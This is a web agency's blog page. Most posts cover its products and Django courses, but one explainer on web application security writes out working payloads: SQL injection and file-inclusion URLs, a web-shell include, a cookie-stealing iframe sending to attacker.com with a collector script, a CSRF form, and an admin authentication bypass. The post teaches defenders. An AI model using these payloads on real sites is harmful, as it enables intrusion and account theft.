Hello! We are MTR Design and site making is our speciality. We work with UK based startups, established businesses, media companies and creative individuals and turn their ideas into reality. This is a thrill and we totally love it.

Dizzyjam @ Music Hack Day

Author: Emil Filipov

If you had a slumberous February weekend, there is no reason to feel bad about it - after all, most of the world did. There was a special group of people, however, who gave up sleep and rest in favor of creating awesome applications that could change the way you and I experience music. Yes, I'm talking about the hackers that took part in the Music Hack Day event in San Francisco. These are the guys pushing the envelope, and these are the ideas you should watch out for, in case you have anything to do with the music industry.

The event produced 66 projects, ranging from turning body outlines into soundwaves via a Kinect controller to a web platform for borrowing/renting musical instruments. It's a (yet invisible) creativity explosion - the sort of mini-nova that bursts into billions of particles, giving birth to planets and star systems millions of years later. Well, in the IT gravitational field a million years pass just like one day, so we should expect the results quite soon!

Thanks to the organizers, we were able to do an online presentation of the Dizzyjam website, and more specifically, of a new feature we've recently added - the Dizzyjam API. As you might expect, it's a web-based, RESTful API that enables you to access all Dizzyjam functions programmatically. It boasts a web console built into the docs, a WordPress plugin, bindings for Python and PHP, as well as a piece of unique functionality - creating new Dizzyjam users through your API account (see the manage/create_user method). The API was put to good use by a very interesting project during the hackathon - Merchr. It's the why-didn't-I-think-of-it-first kind of project - a simple idea that could be a game changer one day. I sincerely hope that the guys behind this project will keep on hacking and bringing good stuff out!
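For a taste of what working with the API looks like, here is a hypothetical Python sketch that builds a call to the manage/create_user method mentioned above. The base URL and parameter names are illustrative assumptions - the API docs and the official bindings are the authoritative source:

```python
from urllib.parse import urlencode

# Illustrative base URL - check the Dizzyjam API docs for the real endpoint.
API_BASE = "https://www.dizzyjam.com/api/v1"

def build_call(method, **params):
    """Build the request URL for an API method such as manage/create_user."""
    query = urlencode(sorted(params.items()))
    return "%s/%s/?%s" % (API_BASE, method, query)

# Creating a new Dizzyjam user through your API account (parameter names assumed):
url = build_call("manage/create_user", email="fan@example.com", name="Jane Fan")
```

From there, any HTTP client (or the Python binding itself) can fire the request and read back the JSON response.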

Published in: Development, Projects

Get in business with Cotton Cart

Author: Milen Nedev

The new merchandising platform makes it possible for anyone to make money from their designs. Show us your style!

Cotton Cart, our newest project, has just launched.

Some of you are probably already familiar with Dizzyjam - our e-commerce and merchandising platform which we created to make it easy and risk-free for anyone in the music industry to make money from their merchandise.

In the past we’ve received quite a lot of requests from people who wanted to use Dizzyjam for selling non-music merchandise. As those requests grew, we started thinking about adding a non-music section to the original website - or creating an entirely new website for anyone who wants to sell merchandise, whatever their business activity is. After a short deliberation we went for the second option, and just before Christmas we did a soft launch of Cotton Cart.

The new site follows the overall idea of www.dizzyjam.com – in only three simple steps anyone can start making money: upload your designs, create your products and start selling. You don’t have to buy 100 blank t-shirts, organize printing, or pile up stock you can’t sell. It won’t cost you a penny. It will, however, take creativity and popularity to make anyone besides your granny buy your stuff - and Cotton Cart is here to solve the popularity issue.

Who can use this website?

Everyone. This may be a graffiti artist who wants to get famous, the grocery shop around the corner where the best veggies are sold, or a charity organisation that raises money for its cause. In fact, such fundraising groups were the first to open their virtual stalls on Cotton Cart. Another clever idea is to use the platform for producing t-shirts or other merch for corporate events – team buildings, annual meetings and seminars. The website can also be used for promoting sports events – just upload your local rugby team’s design, print your merch and sell it to the fans in the neighbourhood. You will surely give the crowd something to remember the next time your team meets its rivals.

The possibilities are countless – your imagination is the limit. So far we have charity and fundraising groups, festivals, sports events and we can’t wait to see what else you can think of while using Cotton Cart.

Python and Django from dawn till dusk

Author: Emil Filipov

Want to learn Python and Django? Then this free seminar is just for you! Ninja training starts at the Telerik Academy in Sofia on Feb 3rd, 2013.

We've been invited to do another training session on Python and Django at the Telerik Academy. This time, it will be an intensive morning-to-evening seminar, with the aim of getting you from zero to hero on both Python and Django. Well, maybe not a true hero, but it will give you the basics of both technologies, so you can go on and study/work with them on your own. If you're in Sofia and getting into Python or Django has always been an unfulfilled childhood dream for you, or if you simply want to pick up some new and highly competitive skills for free, then waste not another minute - hurry to http://academy.telerik.com/seminars/python-and-django-development and reserve your seat!

Published in: Company News, Development

Server monitoring with S2Mon - Part 1

Author: Emil Filipov

We've all heard that servers sometimes break for one reason or another. We often forget, however, how inevitable it is. While everything is working, the system looks like a rock solid blend of software and hardware. You get the feeling that if you don't touch it, it would keep spinning for years.

That's a very misleading feeling. The proper operation of a server depends on many dynamic parts, like having Internet connectivity, stable power supply, proper cooling, enough network bandwidth, free disk space, running services, available CPU power, IO bandwidth, memory, ... That's just the tip of the iceberg, but I think the point is clear - there is a lot that can go wrong with a server. 

Eventually some of those subsystems will break down for one reason or another. When one of them fails, it usually brings down others, creating a digital mayhem that can be quite hard to untangle. Businesses relying on the servers being up and running tend not to look too favorably on the inevitability of the situation. Instead of accepting the incident philosophically and being grateful for the great uptime so far, business owners instead go for questions like "What happened?!?!!", "What's causing this???" and "WHEN WILL IT BE BACK UP????!!!". Sad, I know. 

Smart people, who would rather not come unprepared for those questions, have come up with the idea of monitoring, so that:

  • problems are caught in their infancy, before they cause real damage (e.g. slowly increasing disk space usage);
  • when some malfunction does occur, they can cast a quick glance over the various monitoring gauges, and quickly determine what's the root cause of it;
  • they can follow trends in the server metrics, so they can both get insight into issues from the past and predict future behavior.
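The first point can be made concrete with a toy Python check - the path and threshold here are made up for illustration, not taken from any real monitoring agent:

```python
import shutil

def disk_alert(path="/", threshold_pct=90.0):
    """Warn when disk usage crosses a threshold - catching the problem early."""
    usage = shutil.disk_usage(path)
    used_pct = usage.used / usage.total * 100
    return used_pct >= threshold_pct

# A monitoring agent runs checks like this on a schedule (e.g. from cron)
# and alerts long before usage reaches 100%.
```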

These are all extremely valuable benefits, and it's widely accepted that server monitoring comes second in importance only to backups. Yet there are more servers out there without proper monitoring than you would expect. The main reasons not to set up monitoring are all part of our human nature, and can be summed up as "what a hurdle to install and configure...", "the server is doing its job anyway..." and my favorite, "I'll do it... eventually".

I have some news for the Linux server administrators - you have an excuse no more. We've come up with a web monitoring system for your servers that is easy to set up, rich in functionality and completely free (at least for the time being). Go on and see a demo of it, if you don't believe me. If you decide to subscribe, it will take less than a minute. Adding a machine to be monitored basically boils down to downloading a Bash script and setting it up as a cron job (you'll get step-by-step instructions after you log in and add a new server record on the web). And if you want to integrate S2Mon into a custom workflow/interface of yours, there is API access to everything (in fact, the entire S2Mon website is one big API client).
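For instance, a custom dashboard could pull the raw data points and post-process them itself. The sketch below assumes a JSON payload shape purely for illustration - consult the actual S2Mon API documentation for the real format:

```python
import json

# A made-up S2Mon-style response for a disk-usage metric; the real payload
# shape is defined by the S2Mon API, this one is purely illustrative.
sample = '{"server": "web1", "metric": "disk_used_pct", "points": [71.2, 71.9, 72.4]}'

def latest_value(payload):
    """Return the metric name and its most recent data point."""
    data = json.loads(payload)
    return data["metric"], data["points"][-1]

metric, value = latest_value(sample)
```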

Once you hook up your server to the system, you will unlock a plethora of detailed stats, presented in interactive charts like this one:

Apache children

What we see above is a pretty picture of the load falling on the Apache web server. Apparently, the same pattern has been repeating over the last week. That's visual proof that the web server workload varies a lot throughout the day (nothing unexpected, but we can now actually measure it!).

OK, I now want to see how my disk partitions are faring, and when I should plan for adding disk space:

Disk Usage Stats

Both partitions are steadily growing, but if the current rate holds, there should be enough space for the next 5-6 months.

Hey, you know what, I just got some complaints from a user that a server was slow yesterday, was there anything odd?

Load Average

Yep, most definitely. The load was pretty high throughout the entire afternoon. Believe it or not, this time it was not his virus-infested Windows computer...

Your boss wants some insight on a specific network service, say IMAP? There you go:

IMAP - Connections per service

Wonder what your precious CPU spends its time on? See here:

CPU Stats

As you can see, S2Mon can provide you with extremely detailed stats, ready to be used anytime you need them. Of course, there is a lot more to it, and I'll cover more aspects of the setup, configuration and day-to-day work with S2Mon in the next parts. As always, feedback is more than welcome!

Stayin' secure with Web Security Watch

Author: Emil Filipov

Is your server/website secure? How do you really know? Let me get back to this in a while. 

As you may be aware there is a ton of security advisories released by multiple sources every day. That's a true wealth of valuable information flowing out on the Internet. Being aware of the issues described in these advisories could make all the difference between being safe and getting hacked; between spending a few minutes to patch up, and spending weeks recovering lost data, reputation and customer trust. So who would *not* take advantage of the public security advisories, right?

Quite a lot of people, actually. See, there is the problem of information overflow. There are really a lot of sources of security information, each of them spewing dozens of articles every day. To make it worse, very few of those articles are actually relevant to you. So, if you do want to track them, you end up manually reviewing the 99% of junk to get to the 1% that really matters to your setup. A lot of system/security administrators spend several dull hours every week going through reports that rarely concern them. Some even hire a full-time dedicated operator to process the information. Others simply don't care about the advisories, because the review process is too time-consuming.

Well, we decided we can help with the major pains of the advisory monitoring process. So we built Web Security Watch (WSW) for this purpose. This website aggregates security advisories coming from multiple reputable sources (so you don't miss anything), groups them together (so you don't get multiple copies), and tags them based on the affected products/applications. The last action is particularly important, as tags allow you to filter just the items that you are interested in, e.g. "WordPress", "MySQL", "Apache". What's more, we wrote an RSS module for WordPress, so you can subscribe to an RSS feed which only contains the tags you care about. A custom security feed just for you - how cool is that? Oh, and in case you didn't notice - the site is great for security research. And it's free.
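Consuming such a tag-filtered feed programmatically is straightforward. As a rough Python sketch (the feed snippet below is illustrative, not the exact WSW markup), picking out the items carrying a given tag looks like this:

```python
import xml.etree.ElementTree as ET

# A minimal RSS-like snippet; the real WSW feed markup may differ.
rss = """<rss><channel>
<item><title>WordPress plugin XSS</title><category>WordPress</category></item>
<item><title>MySQL privilege escalation</title><category>MySQL</category></item>
</channel></rss>"""

def items_tagged(feed_xml, tag):
    """Return the titles of feed items carrying the given tag."""
    root = ET.fromstring(feed_xml)
    return [item.findtext("title")
            for item in root.iter("item")
            if tag in [c.text for c in item.findall("category")]]

hits = items_tagged(rss, "WordPress")
```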

Even though WSW is quite young, it already contains more than 4500 advisories, and the number grows every day. We will continue to improve the site functionality and the tagging process, which is still a bit rough around the edges. If you have any feature requests or suggestions, we would be really happy to hear them - feel free to use the contact form to get in touch with us with anything on your mind.

Now, to return to my original question. You can't really tell if your site/server is secure until you see it through the eyes of a hacker. And that requires some capable penetration testers. Even after you've had the perfect penetration test performed by the greatest hackers in the world, however, you may end up hacked and defaced by a script kiddie the next week, due to a vulnerability that has just been disclosed publicly.

Which brings me to the basic truth about staying secure - security is not a state, it's a process. A large part of that process is staying current with the available security information, and Web Security Watch can help you with that part.

PyLogWatch is born

Author: Emil Filipov

Introducing PyLogWatch - a simple and flexible Python utility that lets you capture custom log files into a centralized Sentry logging server.

Here at MTR Design, we manage multiple web apps, servers and system components. All of them generate some kind of logs. Most of the time the logs are trivial and contain nothing we should be concerned about. There is the odd case, however, where some log gets an entry that truly deserves our attention. You see, the signal-to-noise ratio in most logs is very low, so going over all of the logs by hand is an extremely boring and time-consuming task. Yet, there may be "gems" inside the logs that you really want to act on ASAP - say, someone successfully breaking into your server, or an email list going crazy and spamming your customers.

So, what solutions do we have at our disposal? The most noteworthy are Splunk (hosted service, expensive) and Logstash (Java; a pain to install, maintain and customize). I did not like either of them. What I did like was Sentry, which has a logging client (called Raven) available in a dozen languages. The only problem is that Sentry is meant for handling exceptions coming from applications - not for general-purpose logging.

Yet, Sentry has a lot of the features that we do need:

  • Centralized logging with nice Web UI
  • Users, permissions, projects
  • Aggregation, so that similar log messages get grouped together
  • Quick filters, letting you hide message classes you do not care about
  • Plugin system that lets you write your own message processing 
  • Flexible and easy to use logging clients

Since we already had Sentry for handling in-app logging, enabling it to handle general-purpose server logs felt like a very compelling idea. So we did it...

Enter PyLogWatch

... by writing a Python app that parses log files and feeds them to Sentry. The application is very small and simple, and you can run it on any server with a recent version of Python. You don't need to be root, there is no long-running daemon, and no special deployment considerations - just download, configure, run (by cron, or via other means of scheduling). Of course, PyLogWatch relies on you having a Sentry server, but that's not too hard to install either (see the docs), and you can always use the very affordable hosted Sentry service (see the pricing), which features a limited free account.

The PyLogWatch project is still in its infant stages - there are just a couple of *very* basic parsers (for Apache error logs and for syslog files), and no extensions for the Sentry server yet. Nevertheless, it has already proven very useful to us, since it enabled our developers to closely track the Apache error log files for the applications they "own", and swiftly react to any problem that shows up. In practice, each error line generates a "ticket" in Sentry, and it sticks up there until a project member explicitly marks it as resolved. As an optional feature, all project members receive an email whenever there is a new entry waiting to be resolved. 
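The core loop is easy to picture. Here is a simplified Python sketch of the idea - the regex and the send callable are illustrative stand-ins for PyLogWatch's real parser classes and the Raven client, not its actual code:

```python
import re

# Simplified Apache error_log pattern - PyLogWatch's real parsers are richer.
APACHE_ERR = re.compile(r"^\[(?P<ts>[^\]]+)\] \[(?P<level>\w+)\] (?P<msg>.*)$")

def parse_line(line):
    """Split one error_log line into fields Sentry can aggregate on."""
    m = APACHE_ERR.match(line)
    return m.groupdict() if m else None

def ship(entry, send):
    # In PyLogWatch the send callable would be Raven's captureMessage;
    # it is injected here so the sketch stays self-contained.
    if entry and entry["level"] in ("error", "crit"):
        send(entry["msg"], extra={"timestamp": entry["ts"]})

sent = []
ship(parse_line("[Mon Feb 11 09:00:01 2013] [error] File does not exist: /var/www/favicon.ico"),
     lambda msg, extra: sent.append(msg))
```

Each shipped message would then show up as a Sentry event, grouped with similar ones, until someone marks it resolved.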

What I love about this project is that it is a pretty much blank sheet of paper. I believe that using the combined power of custom parsers and Sentry plugins can yield magnificent results.

So what tool are you using for log tracking? What do you like/dislike about it, and what would you ideally like it to do? Feel free to share your thoughts.

Web Application Security Basics

Author: Dimitar Ivanov

Some History

With the development of computers and communication technologies, the question of security is becoming more and more pressing. Nowadays, every individual has some kind of presence on the Internet. This is true to a much greater extent for companies - you simply cannot do business if you do not use the Internet and/or web-based solutions - ERP applications, collaboration tools, you name it. This raises many questions, such as "How secure is the information of my company?"; "How secure is the information of my customers?"; "Can someone access this information without authorization?"; "What do I need to do to protect myself from getting hacked?", etc.

These questions are more relevant today than they were in the past. Twenty years ago very few people used computers, and even fewer dealt with information security. For those that did, this was a hobby or a profession, and they had a different way of thinking - if they found a vulnerability in a piece of software or a system, they would report it to the owners, so that they could fix or mitigate it. I remember in the 90's there was a guy who hacked the name server of our university network through the finger daemon, and reported it immediately without doing any harm. Now, when literally everyone has Internet access, things are quite different. Anyone can download working exploits for recently published vulnerabilities; there are tools that can automate most of the tasks you would go through to hack a website; and do not forget Google and Shodan, which you can use to find vulnerable targets. This is making "hacking" (if you can call it that) very easy.

Why does Web application security matter?

Under these circumstances, it is not hard to answer this question. Since virtually anyone has access to "hacking resources", the threat to information security has increased enormously. With the migration to Web applications, combined with the whole fuss around cloud computing, the focus of the security specialists and researchers has shifted. On one hand, it is harder to find a remote exploit for the operating systems. On the other hand, it is much easier to target and compromise a Web application. Often, the only thing you need to do that is a Web browser - take LFI, RFI, File Upload and SQLi, for example. If the application is vulnerable to LFI, you can include the process environment, which is going to be parsed by the PHP interpreter - if you change the User-Agent to PHP code, it will be executed, giving you remote command execution. If there is an RFI, you can include a Web shell from a remote server, and so on. Additionally, the vulnerabilities are announced publicly, sometimes even before there is a patch for them. Yeah, but

why on earth would someone attack my company?

Well, the motivation of the hacker can be different - industrial espionage; getting a stepping stone (hopping station) for carrying out attacks on other machines/networks; real or imaginary profit; revenge, hacktivism, etc. Anyone can target any company even for no particular reason, so

what could be the damage?

No matter the motivation of the attacker, their actions can cause huge financial losses, loss of reputation and trust, and lawsuits. If a server is hacked and used as a hopping station to target other networks, it may be confiscated by law enforcement, which can lead to additional losses. If its content is deleted, this can directly affect productivity. A compromise of a server can lead to attacks on the internal networks of the company. That is why we need to know what are

the Most Common Vulnerabilities in Web Applications

The Open Web Application Security Project (OWASP) defines ten categories, which combine "the most serious risks for a broad array of organizations." Below, we will outline some of the most common vulnerabilities we have met in the course of our work. Probably the most common and the easiest one to exploit is

SQL Injection - Exploiting the Developer

Almost every dynamic Web application uses some kind of database backend. The content displayed to the application users is stored in the database and displayed in the browser, depending on the parameters passed by the underlying scripts to the backend. These parameters, however, depend on user behavior and can therefore be modified by the user. This is the basic functionality of the Web application. The problems arise when the parameters are passed to the database without any sanitizing. This allows malicious users to close the legitimate query and pass their own queries to the database, getting the results one way or another. In other words, SQL Injection exploits the assumptions made by the application developers. For example, when the developer wrote the following code:

$sql = 'SELECT *
        FROM products
        WHERE id = ' . $_GET['id'];

they wanted the script to query the database for products matching a given ID that is passed as a GET parameter. That is, if the visitors access http://target.com/vulnerable_script.php?id=1, they would see the details for the product with ID 1. The database query will look like this:

SELECT *
FROM products
WHERE id = 1

In this particular case, the developers assumed that the 'id' parameter would always be an integer. However, since the value of the 'id' parameter is passed to the database without any filtering, a malicious user can input the following URL in the browser: http://target.com/vulnerable_script.php?id=1+union+select+0,1,concat_ws(0x3a,user(),database(),version()),3,4,5,6-- In this case, the DB query will look like this:

SELECT *
FROM products
WHERE id = 1
union all
select 0,1,concat_ws(0x3A,user(),database(),version()),3,4,5,6

Basically, this tells the database to display the information about the product with ID 1 and combine it with a row containing the current database user, the name of the database and the version of the database server, joined with colons (0x3A) in the third column. To make this query, the attacker needs to know the number of columns returned by the original query. This information can easily be obtained with a few requests that instruct the database to order the data by a particular column.

This is a basic example of a regular Union-based SQL Injection. There are other flavors of SQLi: error-based, boolean-based blind and time-based blind. Error-based SQL Injection attacks rely on extracting information from the errors returned by the database. There is a nice introductory tutorial on error-based SQLi on Youtube. Surprisingly often, developers think that hiding the errors from the output resolves the vulnerability. Of course, this is not the case - the fact that you cannot see the data returned by the database (union-based) or the errors (error-based) does not mean that the script is not vulnerable. In these cases, an attacker can use Blind SQL Injection to exfiltrate the data, i.e. brute-force it based on boolean or time-based conditions, inspecting the responses of the database server to reconstruct the data. Of course, attackers and pentesters are not stuck with the browser to exploit these vulnerabilities - there are numerous tools that automate the process. The best one is sqlmap; Bernardo and Miroslav have done an amazing job developing this tool.

There are several things that can be done to prevent SQL Injection. The most widely used method is

filtering the user input

This method is the easiest to implement, but if not implemented properly it can be bypassed. There are numerous techniques to bypass defenses based on input filtering - case tampering, white space tampering, encoding the queries. A lot better defense against SQLi is to use

parameterized queries

or "prepared statements". These are essentially templates for SQL queries, which contain placeholders where the user input will go. When the filled-in template is passed to the database, the entire user input ends up in the space allocated for it in the template. The database executes the query from the template, instead of any query that may be smuggled in through the user input. Alternatively, developers can use

ORM (Object Relational Mapping)

This is an object-conversion technique that maps the tables in the database to objects, creating a virtual database layer. In practice, the ORM systems generate parameterized queries. The second most common vulnerability in Web applications is

File Inclusion - Exploiting the Functionality

This is another vulnerability that is fairly easy to find and exploit. Essentially, this is the ability to include files from the machine on which the application runs, or from a remote server visible to this machine. The possibility to include different scripts is essential for the work of every application - this is how the application logic is abstracted, or how different pages are displayed depending on the user's choice. Let's take a fairly simple website that has four pages: Home, News, About Us, Contacts. If the visitor accesses the Home page, the URL they use would look like this:

http://target.com/index.php?page=home

In other words, the script accepts one parameter (page), whose value specifies the page that is requested by the visitor. Let's assume that the script has the following code:

$page = $_GET['page'];
if(isset($page)) {
    include($page);        // the user-supplied value is included directly
} else {
    include('home.php');   // default page (name is illustrative)
}

The code is self-explanatory - the value of the GET parameter page is assigned to a variable 'page'. If its value is not NULL, the script includes the file with a name that is the same as the value. The problem with this code is that the page variable is created from the user input without any checks or filtering. Therefore, if we access the following URL:

http://target.com/index.php?page=/etc/passwd

the script will include and display the contents of the UNIX password file. This is a very simplified example of LFI. Often, programmers think that to secure the script above, they only need to add one little modification:

$page = $_GET['page'];
if(isset($page)) {
    include("$page" . ".html");  // still vulnerable - a null byte (%00) cuts off the extension
} else {
    include('home.html');        // default page (name is illustrative)
}

The only difference here is that a .html extension is added to the page that is included. However, by simply appending a null character (%00) to the URL, the attacker would still be able to include arbitrary files. This depends on the server configuration and the PHP version, and may not work in all cases. In other cases, the developers use the file_exists() function, but this is a functionality check, not a security one, because it does not limit the ability to include existing files.

LFI vulnerabilities can easily lead to command execution in some cases. To achieve this, a malicious user can use the /proc file system, which is used in Linux as an interface to the kernel of the Operating System. Let's say that, again, we have a script that is vulnerable to LFI. To gain the ability to execute commands on the server, a malicious user can include /proc/self/environ. This is the environment of the current process - it contains the environment variables for the running process. Besides the system environment variables, it also contains the CGI variables (REMOTE_ADDR, HTTP_REFERER, HTTP_USER_AGENT, etc.). So, if the hacker changes the User-Agent header passed to the server to a PHP script, the script will be parsed by the PHP interpreter and executed on the server.

So far, we've looked into the ability to include files locally, from the server on which the vulnerable script is running. Including files from remote locations is not that different. Actually, if the server configuration allows the inclusion of remote scripts, and if the script is vulnerable, the only difference will be in the URL - the attacker would just have to use an address, such as

http://target.com/index.php?page=http://attacker.com/php_shell.txt

The file php_shell.txt will be included by the vulnerable script, parsed by the interpreter and executed locally on the server, effectively giving the attacker web shell access to the machine. Much like the SQL Injection vulnerabilities, the File Inclusion vulnerabilities are fairly easy to find and exploit. They, too, are a result of bad programming. Another such result is the

Arbitrary File Upload or Exploiting the Hospitality

We have previously posted about this type of vulnerability, so we are going to skip it here. The truth is that it is not just media upload forms that can be exploited - any file upload script can be used. There may not even be an HTML form; the attackers can just make a request to the script. Even if we have a secure application, we should always be watching for

Unprotected Files or Exploiting the Negligence

People often make mistakes because of negligence, and developers and/or system administrators are no exception to this rule. With the correct Google dorks we can find numerous configuration or backup files with database connect strings, scripts with improper content type that get downloaded instead of executed in the browser, file managers with poor or no authentication, and so on. It may sound weird, but this is a fairly common mistake. Imagine that the developer of a web application has to make a quick change on the production server. They create a backup of the script they are about to change, and then leave the backup file with a .bak extension on the server. Even if the script does not contain sensitive data, such as usernames and passwords, it still represents a security issue, because the backup file will most probably be downloaded by whoever accesses it. In another scenario, the Web application may use a Rich Text Editor, such as FCKEditor. There are lots of vulnerable versions of such editors that allow unauthenticated users to upload arbitrary files. The main reason for this security hole is the fact that people place files where they are not supposed to. To avoid this, you need to make sure that all files that should not be accessible over HTTP are placed outside the Web root directory. If for some reason this is not possible, these files should be protected properly. Probably the most common and overlooked vulnerability is

XSS or Exploiting the User

There are situations in which the Web application allows us to get to the server through its users. XSS (Cross-Site Scripting) vulnerabilities allow the attacker to inject custom scripts, which are executed in the context of the webapp user's browser. They are caused by improper validation of the input and improper escaping of the output. There are two kinds of XSS vulnerabilities: persistent (stored) and non-persistent (reflected). Persistent XSS attacks store the injected code on the server, and it is executed each time the page is displayed to visitors. Here is an example scenario that uses stored XSS to steal the cookie of a Web application user.

  • The attacker creates a script on their server that will collect the cookies.
  • The attacker injects the following hidden iframe in the application:
<iframe frameborder="0" height="0" width="0" src="javascript:void(document.location='http://attacker.com/get_cookies.php?cookie='+document.cookie)"></iframe>
  • An authenticated user loads the page that contains the iframe.
  • The cookie is sent to the script, which writes it to a file or a database.
  • The attacker loads the cookie in their browser and is able to authenticate as the user.
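For illustration, the cookie-collecting script on the attacker's server could be as trivial as the sketch below (hypothetical code; the get_cookies.php name matches the iframe payload, while the cookies.log path is an assumption):

```php
<?php
// get_cookies.php - a minimal cookie collector (attacker side).
// Appends the stolen cookie, the victim's IP and a timestamp to a log file.
$cookie = isset($_GET['cookie']) ? $_GET['cookie'] : '';
$victim = isset($_SERVER['REMOTE_ADDR']) ? $_SERVER['REMOTE_ADDR'] : 'unknown';
file_put_contents('cookies.log', date('c') . " $victim $cookie\n", FILE_APPEND);
```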

Non-persistent XSS attacks are essentially the same; the only difference is that the injected code is not stored on the server. Instead, the attacker needs to trick the user into following a crafted link. Although XSS attacks usually attempt to steal cookies, this is not always the case: they may also target the passwords saved in the browser, and let's not forget BeEF. This means that setting the HttpOnly flag alone is not enough to protect Web application users from XSS attacks. The best protection is to validate and sanitize both the input and the output of the application, along with a tightened cookie security policy. A close relative of the XSS is the

XSRF or Exploiting the Browser

In its essence, the Cross-Site Request Forgery (CSRF or XSRF) attack abuses the trust that a Web application has in its users: it makes the victim's browser issue requests on the attacker's behalf. Suppose we have a page in our Web application where users can change their passwords. If the form is vulnerable to XSRF, the attacker can exploit it to reset a user's password. Here is how such an attack would take place:

  • The attacker creates their own form on their server:
    <body onLoad="javascript:document.password_form.submit()">
        <form action="https://target.com/admin/admin.php?" method="post" name="password_form">
            <input type="hidden" name="a" value="change_password">
            <input type="password" name="password1" value="new_pass">
            <input type="password" name="password2" value="new_pass">
        </form>
    </body>
  • The attacker creates a seemingly empty HTML page, which contains a hidden iframe or an img tag that loads the form.
  • The attacker tricks the user into accessing the page (the user has to have an active session with the Web application).
  • The form submits the data to the server, effectively changing the password.
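One standard defense is an anti-XSRF token: a random value stored in the session and embedded in every form, which an attacker's cross-site page cannot know. Here is a minimal PHP sketch (the csrf_token key name is an arbitrary choice, not a framework convention):

```php
<?php
session_start();

// Generate one random token per session and embed it in every form.
if (empty($_SESSION['csrf_token'])) {
    $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
}
$field = '<input type="hidden" name="csrf_token" value="'
       . htmlspecialchars($_SESSION['csrf_token'], ENT_QUOTES) . '">';

// On submission, reject the request unless the submitted token matches.
function csrf_check($session_token, $submitted_token)
{
    // hash_equals() compares the strings in constant time.
    return is_string($submitted_token)
        && hash_equals($session_token, $submitted_token);
}
```

A forged cross-site form cannot include the right token, so csrf_check() fails and the password change is refused.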

The only difficult part of the attack is tricking the user into visiting the page while logged in to the application. This may be achieved with a spoofed e-mail, an instant message, and so on. To protect users against such attacks, developers need to use anti-XSRF tokens in POST requests. Additionally, sensitive actions, such as changing a password, should require an additional confirmation, usually by asking for the old password. Both XSS and CSRF attacks attempt to steal user accounts. This can also be achieved via attacking the

Authentication and Authorization or Exploiting the Implementation

We all know that assumptions are bad, but we still continue to assume. Fairly often the developers of an application make assumptions about how the authorization and authentication of its users should work. These assumptions are sometimes wrong, and malicious users can conduct actions that do not match what the developers have taken for granted. Let's take one of the most famous shopping cart scripts as an example. Here is how the administrators of the application log in to the administrative interface.

  • The administrator accesses http://target.com/catalog/admin.
  • The script redirects to the login.php script.
  • The administrator enters their login credentials.
  • The script checks the login credentials.
  • If they are correct, the administrator is logged in.
  • If they are not correct, the script asks the user for their login credentials again.

This is achieved by showing the login.php script to every unauthenticated user of the application. Let's see part of the code of the script. Like every other admin script, login.php includes application_top.php:

require('includes/application_top.php');

and here is the part of the application_top.php script that checks whether the user is authenticated:

// redirect to login page if administrator is not yet logged in
if (!tep_session_is_registered('admin')) {
    $redirect = false;
    $current_page = basename($PHP_SELF);
    if ($current_page != FILENAME_LOGIN) {
        if (!tep_session_is_registered('redirect_origin')) {
            $redirect_origin = array('page' => $current_page, 'get' => $HTTP_GET_VARS);
        }
        $redirect = true;
    }
    if ($redirect == true) {
        // ... redirect the user to FILENAME_LOGIN
    }
}

What it basically does is check whether the basename of $PHP_SELF is login.php. If it is, the page is served; otherwise the user is redirected to login.php. Now, imagine that the attacker accesses the following URL:

http://target.com/catalog/admin/file_manager.php/login.php

The basename of $PHP_SELF is login.php, so the redirect is completely bypassed and the script renders the page, which is, of course, file_manager.php.

The attacker can also make a POST request to http://target.com/catalog/admin/administrators.php/login.php?action=insert and add themselves as a site administrator, upload a Web shell, and so on, and so forth.
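The root cause is easy to reproduce in isolation: basename() looks only at the last path segment, so appending /login.php as PATH_INFO disguises any script (a sketch; the path mirrors the URLs above):

```php
<?php
// With PATH_INFO, $PHP_SELF ends in /login.php even though the
// script that actually executes is file_manager.php.
$php_self = '/catalog/admin/file_manager.php/login.php';

echo basename($php_self), "\n";   // login.php - the auth check is fooled
```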

Such vulnerabilities are due to mistakes in the programming logic. They are a bit harder for attackers to detect, but they are extremely unpleasant, as they give unauthenticated users access to the application.

To avoid these vulnerabilities, the logic of the application has to be very well planned, and the implementation should be thoroughly tested.

Of course, there are other vulnerabilities, as well as attacks that are hybrids of the ones described above. No single post can encompass them all, but we can safely say that these are the most common vulnerabilities and attacks on the Internet nowadays.

In a follow-up post we will discuss the defense and the penetration tests as part of the defense.

This article has been translated into Serbo-Croatian by Anja Skrba from Webhostinggeeks.com.

Published in: Development, Security

Another way to make a difference

Author: Emil Filipov

Here at MTR we try to make a difference every day, by challenging stereotypes and finding creative ways to deal with our tasks. This month, however, I will try to make a difference in another way - by doing some teaching. read more ›

Here at MTR we try to make a difference every day, by challenging stereotypes and finding creative ways to deal with our tasks. This month, however, I will try to make a difference in another way - by doing some teaching. A Django Crash Course (in Bulgarian) will take place on Aug 31st, in the headquarters of the initLab hackerspace in Sofia. I've been thinking about this for a while, since Django is basically unknown around here, and I finally found the time to do a little (pr|t)eaching. The plan is to cover the following topics:

1. Installing Python on Windows

2. Introduction to the Python interactive console and demonstrating basic Python constructs/syntax

3. Installing Django on Windows and playing with PYTHONPATH  + startproject

4. Installing Django on Linux; playing with runserver

5. Django Tutorial Part 1 

  • Folder structure
  • Running the development server
  • Database setup
  • Models/ORM
  • Playing with the models from the command line

6. Django Tutorial Part 2

  • Activating the Admin App
  • Adding our models to the Admin
  • Customizing the ModelAdmin

7. Django Tutorial Part 3

  • Routing addresses with the URL dispatcher
  • Writing views and rendering templates
  • Using template constructs
  • Named URLs and URL reversal in code/templates
  • Template resolution
  • Overriding Admin templates
  • Dealing with static media

8. Django Tutorial Part 4

  • Working with basic forms
  • Showcasing ModelForms
  • ModelForm security considerations

9. Making your life easy with Django Debug Toolbar

So there you have it - a Python fanboy trying to convince developers that they deserve better than PHP, during a 4-hour Django intro full of hate, love and ponies. The course is completely free, so do come by if you're in the mood for some webdev action!

Published in: Company News, Development

Poking with Media Upload Forms

Author: Dimitar Ivanov

Every pentester loves file upload forms - the ability to upload data on the server you are testing is what you always aim for. During a recent penetration test, I had quite the fun with a form that was supposed to allow registered users of the site to upload pictures and videos in their profiles. read more ›

What can I say about file upload forms? Every pentester simply loves them - the ability to upload data to the server you are testing is what you always aim for. During a recent penetration test, I had quite a lot of fun with a form that was supposed to allow registered users of the site to upload pictures and videos to their profiles. The idea behind the test was to report everything as it was found, so the developers could fix it on the fly. They had no problems fixing the usual SQL injection and XSS issues, but the image upload turned out to be a real challenge. When I got to the file upload form, it performed no checks whatsoever. I tried to upload a PHP shell, and a second later I was doing the happy hacker dance.
